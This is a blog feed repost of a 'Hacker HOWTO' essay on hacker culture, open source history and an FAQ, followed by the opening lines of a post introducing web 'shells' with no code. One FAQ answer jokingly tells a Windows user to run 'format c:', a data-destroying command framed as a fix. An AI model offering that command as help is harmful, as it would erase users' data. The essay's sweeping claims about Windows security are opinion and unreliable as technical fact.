Like most cultures without a money economy, hackerdom runs on reputation. You&#39;re trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge.&lt;br /&gt;
&lt;br /&gt;
Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren&#39;t really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (gradually decaying since the late 1990s but still potent) against admitting that ego or external validation are involved in one&#39;s motivation at all.&lt;br /&gt;
&lt;br /&gt;
Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill.&lt;br /&gt;
&lt;br /&gt;
There are basically five kinds of things you can do to be respected by hackers:&lt;br /&gt;
&lt;br /&gt;
1. Write open-source software&lt;br /&gt;
&lt;br /&gt;
The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use.&lt;br /&gt;
&lt;br /&gt;
(We used to call these works “free software”, but this confused too many people who weren&#39;t sure exactly what “free” was supposed to mean. Most of us now prefer the term “open-source” software).&lt;br /&gt;
&lt;br /&gt;
Hackerdom&#39;s most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.&lt;br /&gt;
&lt;br /&gt;
But there&#39;s a bit of a fine historical point here. While hackers have always looked up to the open-source developers among them as our community&#39;s hardest core, before the mid-1990s most hackers most of the time worked on closed source. This was still true when I wrote the first version of this HOWTO in 1996; it took the mainstreaming of open-source software after 1997 to change things. Today, &quot;the hacker community&quot; and &quot;open-source developers&quot; are two descriptions for what is essentially the same culture and population — but it is worth remembering that this was not always so. (For more on this, see the section called “Historical Note: Hacking, Open Source, and Free Software”.)&lt;br /&gt;
&lt;br /&gt;
2. Help test and debug open-source software&lt;br /&gt;
&lt;br /&gt;
They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That&#39;s why any open-source author who&#39;s thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that&#39;s a protracted, exhausting nightmare and one that&#39;s merely a salutary nuisance.&lt;br /&gt;
&lt;br /&gt;
If you&#39;re a newbie, try to find a program under development that you&#39;re interested in and be a good beta-tester. There&#39;s a natural progression from helping test programs to helping debug them to helping modify them. You&#39;ll learn a lot this way, and generate good karma with people who will help you later on.&lt;br /&gt;
&lt;br /&gt;
3. Publish useful information&lt;br /&gt;
&lt;br /&gt;
Another good thing is to collect and filter useful and interesting information into web pages or documents like Frequently Asked Questions (FAQ) lists, and make those generally available.&lt;br /&gt;
&lt;br /&gt;
Maintainers of major technical FAQs get almost as much respect as open-source authors.&lt;br /&gt;
&lt;br /&gt;
4. Help keep the infrastructure working&lt;br /&gt;
&lt;br /&gt;
The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There&#39;s a lot of necessary but unglamorous work that needs done to keep it going — administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards.&lt;br /&gt;
&lt;br /&gt;
People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication.&lt;br /&gt;
&lt;br /&gt;
5. Serve the hacker culture itself&lt;br /&gt;
&lt;br /&gt;
Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker :-)). This is not something you&#39;ll be positioned to do until you&#39;ve been around for while and become well-known for one of the first four things.&lt;br /&gt;
&lt;br /&gt;
The hacker culture doesn&#39;t have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you&#39;ve been in the trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Hacker/Nerd Connection&lt;br /&gt;
&lt;br /&gt;
Contrary to popular myth, you don&#39;t have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being something of a social outcast helps you stay concentrated on the really important things, like thinking and hacking.&lt;br /&gt;
&lt;br /&gt;
For this reason, many hackers have adopted the label ‘geek’ as a badge of pride — it&#39;s a way of declaring their independence from normal social expectations (as well as a fondness for other things like science fiction and strategy games that often go with being a hacker). The term &#39;nerd&#39; used to be used this way back in the 1990s, back when &#39;nerd&#39; was a mild pejorative and &#39;geek&#39; a rather harsher one; sometime after 2000 they switched places, at least in U.S. popular culture, and there is now even a significant geek-pride culture among people who aren&#39;t techies.&lt;br /&gt;
&lt;br /&gt;
If you can manage to concentrate enough on hacking to be good at it and still have a life, that&#39;s fine. This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now. There are even growing numbers of people who realize that hackers are often high-quality lover and spouse material.&lt;br /&gt;
&lt;br /&gt;
If you&#39;re attracted to hacking because you don&#39;t have a life, that&#39;s OK too — at least you won&#39;t have trouble concentrating. Maybe you&#39;ll get a life later on.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Points For Style&lt;br /&gt;
&lt;br /&gt;
Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you&#39;re not at a computer that seem to help. They&#39;re not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.&lt;br /&gt;
&lt;br /&gt;
Learn to write your native language well. Though it&#39;s a common stereotype that programmers can&#39;t write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.&lt;br /&gt;
&lt;br /&gt;
Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).&lt;br /&gt;
&lt;br /&gt;
Train in a martial-arts form. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most popular forms among hackers are definitely Asian empty-hand arts such as Tae Kwon Do, various forms of Karate, Kung Fu, Aikido, or Ju Jitsu. Western fencing and Asian sword arts also have visible followings. In places where it&#39;s legal, pistol shooting has been rising in popularity since the late 1990s. The most hackerly martial arts are those which emphasize mental discipline, relaxed awareness, and control, rather than raw strength, athleticism, or physical toughness.&lt;br /&gt;
&lt;br /&gt;
Study an actual meditation discipline. The perennial favorite among hackers is Zen (importantly, it is possible to benefit from Zen without acquiring a religion or discarding one you already have). Other styles may work as well, but be careful to choose one that doesn&#39;t require you to believe crazy things.&lt;br /&gt;
&lt;br /&gt;
Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.&lt;br /&gt;
&lt;br /&gt;
Develop your appreciation of puns and wordplay.&lt;br /&gt;
&lt;br /&gt;
The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they&#39;re connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment&#39;s notice.&lt;br /&gt;
&lt;br /&gt;
Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between &quot;play&quot;, &quot;work&quot;, &quot;science&quot; and &quot;art&quot; all tend to disappear, or to merge into a high-level creative playfulness. Also, don&#39;t be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills — system administration, web design, and PC hardware troubleshooting are common ones. A hacker who&#39;s a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don&#39;t do things by halves; if they invest in a skill at all, they tend to get very good at it.&lt;br /&gt;
&lt;br /&gt;
Finally, a few things not to do.&lt;br /&gt;
&lt;br /&gt;
Don&#39;t use a silly, grandiose user ID or screen name.&lt;br /&gt;
&lt;br /&gt;
Don&#39;t get in flame wars on Usenet (or anywhere else).&lt;br /&gt;
&lt;br /&gt;
Don&#39;t call yourself a ‘cyberpunk’, and don&#39;t waste your time on anybody who does.&lt;br /&gt;
&lt;br /&gt;
Don&#39;t post or email writing that&#39;s full of spelling errors and bad grammar.&lt;br /&gt;
&lt;br /&gt;
The only reputation you&#39;ll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted.&lt;br /&gt;
&lt;br /&gt;
The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms. Hackers don&#39;t do this; they&#39;re proud of what they do and want it associated with their real names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Historical Note: Hacking, Open Source, and Free Software&lt;br /&gt;
&lt;br /&gt;
When I originally wrote this how-to in late 1996, some of the conditions around it were very different from the way they look today. A few words about these changes may help clarify matters for people who are confused about the relationship of open source, free software, and Linux to the hacker community. If you are not curious about this, you can skip straight to the FAQ and bibliography from here.&lt;br /&gt;
&lt;br /&gt;
The hacker ethos and community as I have described it here long predates the emergence of Linux after 1990; I first became involved with it around 1976, and, its roots are readily traceable back to the early 1960s. But before Linux, most hacking was done on either proprietary operating systems or a handful of quasi-experimental homegrown systems like MIT&#39;s ITS that were never deployed outside of their original academic niches. While there had been some earlier (pre-Linux) attempts to change this situation, their impact was at best very marginal and confined to communities of dedicated true believers which were tiny minorities even within the hacker community, let alone with respect to the larger world of software in general.&lt;br /&gt;
&lt;br /&gt;
What is now called &quot;open source&quot; goes back as far as the hacker community does, but until 1985 it was an unnamed folk practice rather than a conscious movement with theories and manifestos attached to it. This prehistory ended when, in 1985, arch-hacker Richard Stallman (&quot;RMS&quot;) tried to give it a name — &quot;free software&quot;. But his act of naming was also an act of claiming; he attached ideological baggage to the &quot;free software&quot; label which much of the existing hacker community never accepted. As a result, the &quot;free software&quot; label was loudly rejected by a substantial minority of the hacker community (especially among those associated with BSD Unix), and used with serious but silent reservations by a majority of the remainder (including myself).&lt;br /&gt;
&lt;br /&gt;
Despite these reservations, RMS&#39;s claim to define and lead the hacker community under the &quot;free software&quot; banner broadly held until the mid-1990s. It was seriously challenged only by the rise of Linux. Linux gave open-source development a natural home. Many projects issued under terms we would now call open-source migrated from proprietary Unixes to Linux. The community around Linux grew explosively, becoming far larger and more heterogenous than the pre-Linux hacker culture. RMS determinedly attempted to co-opt all this activity into his &quot;free software&quot; movement, but was thwarted by both the exploding diversity of the Linux community and the public skepticism of its founder, Linus Torvalds. Torvalds continued to use the term &quot;free software&quot; for lack of any alternative, but publicly rejected RMS&#39;s ideological baggage. Many younger hackers followed suit.&lt;br /&gt;
&lt;br /&gt;
In 1996, when I first published this Hacker HOWTO, the hacker community was rapidly reorganizing around Linux and a handful of other open-source operating systems (notably those descended from BSD Unix). Community memory of the fact that most of us had spent decades developing closed-source software on closed-source operating systems had not yet begun to fade, but that fact was already beginning to seem like part of a dead past; hackers were, increasingly, defining themselves as hackers by their attachments to open-source projects such as Linux or Apache.&lt;br /&gt;
&lt;br /&gt;
The term &quot;open source&quot;, however, had not yet emerged; it would not do so until early 1998. When it did, most of hacker community adopted it within the following six months; the exceptions were a minority ideologically attached to the term &quot;free software&quot;. Since 1998, and especially after about 2003, the identification of &#39;hacking&#39; with &#39;open-source (and free software) development&#39; has become extremely close. Today there is little point in attempting to distinguish between these categories, and it seems unlikely that will change in the future.&lt;br /&gt;
&lt;br /&gt;
It is worth remembering, however, that this was not always so.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Other Resources&lt;br /&gt;
&lt;br /&gt;
Paul Graham has written an essay called Great Hackers, and another on Undergraduation, in which he speaks much wisdom.&lt;br /&gt;
&lt;br /&gt;
There is a document called How To Be A Programmer that is an excellent complement to this one. It has valuable advice not just about coding and skillsets, but about how to function on a programming team.&lt;br /&gt;
&lt;br /&gt;
I have also written A Brief History Of Hackerdom.&lt;br /&gt;
&lt;br /&gt;
I have written a paper, The Cathedral and the Bazaar, which explains a lot about how the Linux and open-source cultures work. I have addressed this topic even more directly in its sequel Homesteading the Noosphere.&lt;br /&gt;
&lt;br /&gt;
Rick Moen has written an excellent document on how to run a Linux user group.&lt;br /&gt;
&lt;br /&gt;
Rick Moen and I have collaborated on another document on How To Ask Smart Questions. This will help you seek assistance in a way that makes it more likely that you will actually get it.&lt;br /&gt;
&lt;br /&gt;
If you need instruction in the basics of how personal computers, Unix, and the Internet work, see The Unix and Internet Fundamentals HOWTO.&lt;br /&gt;
&lt;br /&gt;
When you release software or write patches for software, try to follow the guidelines in the Software Release Practice HOWTO.&lt;br /&gt;
&lt;br /&gt;
If you enjoyed the Zen poem, you might also like Rootless Root: The Unix Koans of Master Foo.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Frequently Asked Questions&lt;br /&gt;
&lt;br /&gt;
Q: How do I tell if I am already a hacker?&lt;br /&gt;
Q: Will you teach me how to hack?&lt;br /&gt;
Q: How can I get started, then?&lt;br /&gt;
Q: When do you have to start? Is it too late for me to learn?&lt;br /&gt;
Q: How long will it take me to learn to hack?&lt;br /&gt;
Q: Is Visual Basic a good language to start with?&lt;br /&gt;
Q: Would you help me to crack a system, or teach me how to crack?&lt;br /&gt;
Q: How can I get the password for someone else&#39;s account?&lt;br /&gt;
Q: How can I break into/read/monitor someone else&#39;s email?&lt;br /&gt;
Q: How can I steal channel op privileges on IRC?&lt;br /&gt;
Q: I&#39;ve been cracked. Will you help me fend off further attacks?&lt;br /&gt;
Q: I&#39;m having problems with my Windows software. Will you help me?&lt;br /&gt;
Q: Where can I find some real hackers to talk with?&lt;br /&gt;
Q: Can you recommend useful books about hacking-related subjects?&lt;br /&gt;
Q: Do I need to be good at math to become a hacker?&lt;br /&gt;
Q: What language should I learn first?&lt;br /&gt;
Q: What kind of hardware do I need?&lt;br /&gt;
Q: I want to contribute. Can you help me pick a problem to work on?&lt;br /&gt;
Q: Do I need to hate and bash Microsoft?&lt;br /&gt;
Q: But won&#39;t open-source software leave programmers unable to make a living?&lt;br /&gt;
Q: Where can I get a free Unix?&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
How do I tell if I am already a hacker?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
Ask yourself the following three questions:&lt;br /&gt;
&lt;br /&gt;
Do you speak code, fluently?&lt;br /&gt;
&lt;br /&gt;
Do you identify with the goals and values of the hacker community?&lt;br /&gt;
&lt;br /&gt;
Has a well-established member of the hacker community ever called you a hacker?&lt;br /&gt;
&lt;br /&gt;
If you can answer yes to all three of these questions, you are already a hacker. No two alone are sufficient.&lt;br /&gt;
&lt;br /&gt;
The first test is about skills. You probably pass it if you have the minimum technical skills described earlier in this document. You blow right through it if you have had a substantial amount of code accepted by an open-source development project.&lt;br /&gt;
&lt;br /&gt;
The second test is about attitude. If the five principles of the hacker mindset seemed obvious to you, more like a description of the way you already live than anything novel, you are already halfway to passing it. That&#39;s the inward half; the other, outward half is the degree to which you identify with the hacker community&#39;s long-term projects.&lt;br /&gt;
&lt;br /&gt;
Here is an incomplete but indicative list of some of those projects: Does it matter to you that Linux improve and spread? Are you passionate about software freedom? Hostile to monopolies? Do you act on the belief that computers can be instruments of empowerment that make the world a richer and more humane place?&lt;br /&gt;
&lt;br /&gt;
But a note of caution is in order here. The hacker community has some specific, primarily defensive political interests — two of them are defending free-speech rights and fending off &quot;intellectual-property&quot; power grabs that would make open source illegal. Some of those long-term projects are civil-liberties organizations like the Electronic Frontier Foundation, and the outward attitude properly includes support of them. But beyond that, most hackers view attempts to systematize the hacker attitude into an explicit political program with suspicion; we&#39;ve learned, the hard way, that these attempts are divisive and distracting. If someone tries to recruit you to march on your capitol in the name of the hacker attitude, they&#39;ve missed the point. The right response is probably “Shut up and show them the code.”&lt;br /&gt;
&lt;br /&gt;
The third test has a tricky element of recursiveness about it. I observed in the section called “What Is a Hacker?” that being a hacker is partly a matter of belonging to a particular subculture or social network with a shared history, an inside and an outside. In the far past, hackers were a much less cohesive and self-aware group than they are today. But the importance of the social-network aspect has increased over the last thirty years as the Internet has made connections with the core of the hacker subculture easier to develop and maintain. One easy behavioral index of the change is that, in this century, we have our own T-shirts.&lt;br /&gt;
&lt;br /&gt;
Sociologists, who study networks like those of the hacker culture under the general rubric of &quot;invisible colleges&quot;, have noted that one characteristic of such networks is that they have gatekeepers — core members with the social authority to endorse new members into the network. Because the &quot;invisible college&quot; that is hacker culture is a loose and informal one, the role of gatekeeper is informal too. But one thing that all hackers understand in their bones is that not every hacker is a gatekeeper. Gatekeepers have to have a certain degree of seniority and accomplishment before they can bestow the title. How much is hard to quantify, but every hacker knows it when they see it.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
Will you teach me how to hack?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
Since first publishing this page, I&#39;ve gotten several requests a week (often several a day) from people to &quot;teach me all about hacking&quot;. Unfortunately, I don&#39;t have the time or energy to do this; my own hacking projects, and working as an open-source advocate, take up 110% of my time.&lt;br /&gt;
&lt;br /&gt;
Even if I did, hacking is an attitude and skill you basically have to teach yourself. You&#39;ll find that while real hackers want to help you, they won&#39;t respect you if you beg to be spoon-fed everything they know.&lt;br /&gt;
&lt;br /&gt;
Learn a few things first. Show that you&#39;re trying, that you&#39;re capable of learning on your own. Then go to the hackers you meet with specific questions.&lt;br /&gt;
&lt;br /&gt;
If you do email a hacker asking for advice, here are two things to know up front. First, we&#39;ve found that people who are lazy or careless in their writing are usually too lazy and careless in their thinking to make good hackers — so take care to spell correctly, and use good grammar and punctuation, otherwise you&#39;ll probably be ignored. Secondly, don&#39;t dare ask for a reply to an ISP account that&#39;s different from the account you&#39;re sending from; we find people who do that are usually thieves using stolen accounts, and we have no interest in rewarding or assisting thievery.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
How can I get started, then?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
The best way for you to get started would probably be to go to a LUG (Linux user group) meeting. You can find such groups on the LDP General Linux Information Page; there is probably one near you, possibly associated with a college or university. LUG members will probably give you a Linux if you ask, and will certainly help you install one and get started.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
When do you have to start? Is it too late for me to learn?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
Any age at which you are motivated to start is a good age. Most people seem to get interested between ages 15 and 20, but I know of exceptions in both directions.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
How long will it take me to learn to hack?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
That depends on how talented you are and how hard you work at it. Most people who try can acquire a respectable skill set in eighteen months to two years, if they concentrate. Don&#39;t think it ends there, though; in hacking (as in many other fields) it takes about ten years to achieve mastery. And if you are a real hacker, you will spend the rest of your life learning and perfecting your craft.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
Is Visual Basic a good language to start with?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
If you&#39;re asking this question, it almost certainly means you&#39;re thinking about trying to hack under Microsoft Windows. This is a bad idea in itself. When I compared trying to learn to hack under Windows to trying to learn to dance while wearing a body cast, I wasn&#39;t kidding. Don&#39;t go there. It&#39;s ugly, and it never stops being ugly.&lt;br /&gt;
&lt;br /&gt;
There is a specific problem with Visual Basic; mainly that it&#39;s not portable. Though there is a prototype open-source implementations of Visual Basic, the applicable ECMA standards don&#39;t cover more than a small set of its programming interfaces. On Windows most of its library support is proprietary to a single vendor (Microsoft); if you aren&#39;t extremely careful about which features you use — more careful than any newbie is really capable of being — you&#39;ll end up locked into only those platforms Microsoft chooses to support. If you&#39;re starting on a Unix, much better languages with better libraries are available. Python, for example.&lt;br /&gt;
&lt;br /&gt;
Also, like other Basics, Visual Basic is a poorly-designed language that will teach you bad programming habits. No, don&#39;t ask me to describe them in detail; that explanation would fill a book. Learn a well-designed language instead.&lt;br /&gt;
&lt;br /&gt;
One of those bad habits is becoming dependent on a single vendor&#39;s libraries, widgets, and development tools. In general, any language that isn&#39;t fully supported under at least Linux or one of the BSDs, and/or at least three different vendors&#39; operating systems, is a poor one to learn to hack in.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
Would you help me to crack a system, or teach me how to crack?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
No. Anyone who can still ask such a question after reading this FAQ is too stupid to be educable even if I had the time for tutoring. Any emailed requests of this kind that I get will be ignored or answered with extreme rudeness.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
How can I get the password for someone else&#39;s account?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
This is cracking. Go away, idiot.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
How can I break into/read/monitor someone else&#39;s email?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
This is cracking. Get lost, moron.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
How can I steal channel op privileges on IRC?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
This is cracking. Begone, cretin.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
I&#39;ve been cracked. Will you help me fend off further attacks?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
No. Every time I&#39;ve been asked this question so far, it&#39;s been from some poor sap running Microsoft Windows. It is not possible to effectively secure Windows systems against crack attacks; the code and architecture simply have too many flaws, which makes securing Windows like trying to bail out a boat with a sieve. The only reliable prevention starts with switching to Linux or some other operating system that is designed to at least be capable of security.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
I&#39;m having problems with my Windows software. Will you help me?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
Yes. Go to a DOS prompt and type &quot;format c:&quot;. Any problems you are experiencing will cease within a few minutes.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
Where can I find some real hackers to talk with?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
The best way is to find a Unix or Linux user&#39;s group local to you and go to their meetings (you can find links to several lists of user groups on the LDP site at ibiblio).&lt;br /&gt;
&lt;br /&gt;
(I used to say here that you wouldn&#39;t find any real hackers on IRC, but I&#39;m given to understand this is changing. Apparently some real hacker communities, attached to things like GIMP and Perl, have IRC channels now.)&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
Can you recommend useful books about hacking-related subjects?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
I maintain a Linux Reading List HOWTO that you may find helpful. The Loginataka may also be interesting.&lt;br /&gt;
&lt;br /&gt;
For an introduction to Python, see the tutorial on the Python site.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
Do I need to be good at math to become a hacker?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
No. Hacking uses very little formal mathematics or arithmetic. In particular, you won&#39;t usually need trigonometry, calculus or analysis (there are exceptions to this in a handful of specific application areas like 3-D computer graphics). Knowing some formal logic and Boolean algebra is good. Some grounding in finite mathematics (including finite-set theory, combinatorics, and graph theory) can be helpful.&lt;br /&gt;
&lt;br /&gt;
Much more importantly: you need to be able to think logically and follow chains of exact reasoning, the way mathematicians do. While the content of most mathematics won&#39;t help you, you will need the discipline and intelligence to handle mathematics. If you lack the intelligence, there is little hope for you as a hacker; if you lack the discipline, you&#39;d better grow it.&lt;br /&gt;
&lt;br /&gt;
I think a good way to find out if you have what it takes is to pick up a copy of Raymond Smullyan&#39;s book What Is The Name Of This Book?. Smullyan&#39;s playful logical conundrums are very much in the hacker spirit. Being able to solve them is a good sign; enjoying solving them is an even better one.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
What language should I learn first?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
XHTML (the latest dialect of HTML) if you don&#39;t already know it. There are a lot of glossy, hype-intensive bad HTML books out there, and distressingly few good ones. The one I like best is HTML: The Definitive Guide.&lt;br /&gt;
&lt;br /&gt;
But HTML is not a full programming language. When you&#39;re ready to start programming, I would recommend starting with Python. You will hear a lot of people recommending Perl, but it&#39;s harder to learn and (in my opinion) less well designed.&lt;br /&gt;
&lt;br /&gt;
C is really important, but it&#39;s also much more difficult than either Python or Perl. Don&#39;t try to learn it first.&lt;br /&gt;
&lt;br /&gt;
Windows users, do not settle for Visual Basic. It will teach you bad habits, and it&#39;s not portable off Windows. Avoid.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
What kind of hardware do I need?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
It used to be that personal computers were rather underpowered and memory-poor, enough so that they placed artificial limits on a hacker&#39;s learning process. This stopped being true in the mid-1990s; any machine from an Intel 486DX50 up is more than powerful enough for development work, X, and Internet communications, and the smallest disks you can buy today are plenty big enough.&lt;br /&gt;
&lt;br /&gt;
The important thing in choosing a machine on which to learn is whether its hardware is Linux-compatible (or BSD-compatible, should you choose to go that route). Again, this will be true for almost all modern machines. The only really sticky areas are modems and wireless cards; some machines have Windows-specific hardware that won&#39;t work with Linux.&lt;br /&gt;
&lt;br /&gt;
There&#39;s a FAQ on hardware compatibility; the latest version is here.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
I want to contribute. Can you help me pick a problem to work on?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
No, because I don&#39;t know your talents or interests. You have to be self-motivated or you won&#39;t stick, which is why having other people choose your direction almost never works.&lt;br /&gt;
&lt;br /&gt;
Try this. Watch the project announcements scroll by on Freshmeat for a few days. When you see one that makes you think &quot;Cool! I&#39;d like to work on that!&quot;, join it.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
Do I need to hate and bash Microsoft?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
No, you don&#39;t. Not that Microsoft isn&#39;t loathsome, but there was a hacker culture long before Microsoft and there will still be one long after Microsoft is history. Any energy you spend hating Microsoft would be better spent on loving your craft. Write good code — that will bash Microsoft quite sufficiently without polluting your karma.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
But won&#39;t open-source software leave programmers unable to make a living?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
This seems unlikely — so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net economic gain over not having it written, a programmer will get paid whether or not the program is going to be open-source after it&#39;s done. And, no matter how much &quot;free&quot; software gets written, there always seems to be more demand for new and customized applications. I&#39;ve written more about this at the Open Source pages.&lt;br /&gt;
&lt;br /&gt;
Q:&lt;br /&gt;
&lt;br /&gt;
Where can I get a free Unix?&lt;br /&gt;
&lt;br /&gt;
A:&lt;br /&gt;
&lt;br /&gt;
If you don&#39;t have a Unix installed on your machine yet, elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to educate yourself. Start now...</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/5707057584462976674/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/hacking-history-faq.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/5707057584462976674'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/5707057584462976674'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/hacking-history-faq.html' title='Hacking history / FAQ'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-7529000591567527161</id><published>2013-07-18T02:00:00.000-07:00</published><updated>2013-07-18T02:00:56.570-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="web"/><title type='text'>Basics about Shells</title><content type='html'>&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;I am sure many have you have read about &quot;Hacked / Defaced with shells&quot;, So I am pretty sure that the first thing that comes to your mind is &quot;What the heck are these shells?&quot; . So this article would give you complete idea about shells and its use.&lt;/span&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;I will soon write about &quot;RFI, LFI&quot; which are somewhat connected with shells. Meanwhile, keep playing with it and learn more. As without practice you won&#39;t get anything.&lt;/span&gt;&lt;br /&gt;
